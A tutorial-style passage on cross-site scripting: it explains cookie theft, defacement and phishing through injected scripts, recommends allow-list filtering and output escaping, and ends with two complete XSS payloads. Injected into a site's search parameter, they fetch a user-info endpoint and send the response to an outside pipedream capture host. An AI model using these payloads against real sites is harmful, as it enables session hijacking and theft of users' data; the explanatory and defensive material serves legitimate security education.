2.2 - XSS Injection

XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. An attacker injects some code, the web application saves it and displays it on a page, later presented to a victim. Most XSS examples simply display an alert box, but it is more powerful than that. XSS can steal the cookie, hijack the session, redirect the victim to a fake website, display advertisements for the benefit of the attacker, change elements on the web site to get confidential information or install malicious software through security holes in the web browser.
The most common entry points are message posts, user comments, and guest books, but project titles, document names, and search result pages have also been vulnerable - just about everywhere where the user can input data. But the input does not necessarily have to come from input boxes on web sites, it can be in any URL parameter - obvious, hidden or internal. Remember that the user may intercept any traffic. Applications or client-site proxies make it easy to change requests. There are also other attack vectors like banner advertisements.
There are different types of XSS like Stored XSS, Reflected XSS etc but I will not be covering them here. There is plenty of information available online about the types and you can read up on it. I will show a live demo of XSS and how you can find it using kali linux and DVWA.
The most common XSS language is of course the most popular client-side scripting language JavaScript, often in combination with HTML. Escaping user input is essential.
Here is the most straightforward test to check for XSS. This JavaScript code will simply display an alert box.
These examples don't do any harm so far, so let's see how an attacker can steal the user's cookie (and thus hijack the user's session). In JavaScript you can use the document.cookie property to read and write the document's cookie. JavaScript enforces the same origin policy, that means a script from one domain cannot access cookies of another domain. The document.cookie property holds the cookie of the originating web server. However, you can read and write this property, if you embed the code directly in the HTML document (as it happens with XSS). Inject this anywhere in your web application to see your own cookie on the result page.
For an attacker, of course, this is not useful, as the victim will see their own cookie. The next example will try to load an image from the URL http://www.hackerwebsite.com plus the cookie. Of course this URL does not exist, so the browser displays nothing. But the attacker can review their web server's access log files to see the victim's cookie.
With web page defacement an attacker can do a lot of things, for example, present false information or lure the victim on the attackers web site to steal the cookie, login credentials, or other sensitive data. The most popular way is to include code from external sources by iframes
This loads arbitrary HTML and/or JavaScript from an external source and embeds it as part of the site. A more specialized attack could overlap the entire web site or display a login form, which looks the same as the site's original, but transmits the user name and password to the attacker's site. Or it could use CSS and/or JavaScript to hide a legitimate link in the web application, and display another one at its place which redirects to a fake web site.
It is very important to filter malicious input, but it is also important to escape the output of the web application. Especially for XSS, it is important to do permitted input filtering instead of restricted. Permitted list filtering states the values allowed as opposed to the values not allowed. Restricted lists are never complete. We'll take a look at why restricted lists do not work.
Imagine a restricted list deletes "script" from the user input. Now the attacker injects "<scrscriptipt>", and after the filter, "<script>" remains. Earlier versions of Rails used a restricted list approach for the strip_tags(), strip_links() and sanitize() method. So this kind of injection was possible. This returned "some<script>alert('hello')</script>", which makes an attack work.
That's why a permitted list approach is better, using the updated Rails 2 method sanitize(). This allows only the given tags and does a good job, even against all kinds of tricks and malformed tags.
As a second step, it is good practice to escape all output of the application, especially when re-displaying user input, which hasn't been input-filtered (as in the search form example earlier on). Use escapeHTML() (or its alias h()) method to replace the HTML input characters &, ", <, and > by their uninterpreted representations in HTML (&, ", <, and >).

<https://www.somewebsite.com/blog/?post_type=post&s=%3Cscript%3E+var+jq+%3D+document.createElement(%27script%27);+jq.src+%3D+%22https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js%22;+document.getElementsByTagName(%27head%27)[0].appendChild(jq);+jQuery.noConflict();+setTimeout(function()+{$.ajax({url:%27/video/category%27,+method:%27GET%27,+success:+function(resp)+{setTimeout(function()+{$.ajax({url:%27https://enek0fazyag.x.pipedream.net%27,+method:%27PUT%27,+data:+JSON.stringify(resp),+success:+function(resp)+{window.location+%3D+%22https://gauravsinghparweshwar.somewebsite.com/video/play/XAtjeDGN6Z0Eja1En--ENcBs-f9h_tt5WW4pg2UFZ7k%3Futm_source%3Dhv-campaigns%26hreferer%3Dprivate%26_%3D1587128561447%22;}>})},+500)}})},+500)+%3C/script%3E

<https://www.somewebsite.com/blog/?post_type=post&s=>
<script> var jq = document.createElement('script');
jq.src = "<https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js>";
document.getElementsByTagName('head')[0].appendChild(jq);
jQuery.noConflict();
setTimeout(function() {
	$.ajax(
{url:'/video/delivery/user_info', method:'GET', success: function(resp) {setTimeout(function() {
	$.ajax({url:'<https://enek0fazyag.x.pipedream.net>', method:'GET', data: JSON.stringify(resp), success: function(resp) {alert(JSON.stringify(resp))}})}, 500) }})}, 500)
s</script>